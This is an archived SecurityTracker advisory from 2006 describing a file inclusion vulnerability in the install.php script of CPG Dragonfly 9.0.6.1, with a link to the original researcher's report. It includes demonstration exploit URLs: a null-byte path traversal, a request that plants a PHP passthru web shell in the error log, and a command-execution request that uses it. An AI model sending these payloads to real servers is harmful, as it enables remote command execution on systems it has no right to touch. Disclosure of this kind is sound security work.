SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   CPG Dragonfly Vendors:   CPG-Nuke
CPG Dragonfly Include File Bug in 'install.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015601
SecurityTracker URL:  http://securitytracker.com/id/1015601
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 8 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 9.0.6.1
Description:   rgod reported a vulnerability in CPG Dragonfly. A remote user can include and execute files on the target system.

The 'install.php' script does not properly validate user-supplied input in the 'newlang' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/install.php?newlang=../../cpg_error.log%00

The 'installlang' cookie parameter is also affected.

A remote user can cause arbitrary PHP code to be written to a file on the system, such as the 'cpg_error.log' file. Then, the file can be included and executed using the vulnerability described above.

A demonstration exploit URL sequence is provided:

http://[target]/[path]/error.php?<?passthru($_GET[cmd]);?>
http://[target]/[path]/install.php?cmd=ls%20-la&newlang=../../cpg_error.log%00

The original advisory is available at:

http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.cpgnuke.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CPGNuke Dragonfly 9.0.6.1 remote commands execution

http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html

rgod
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC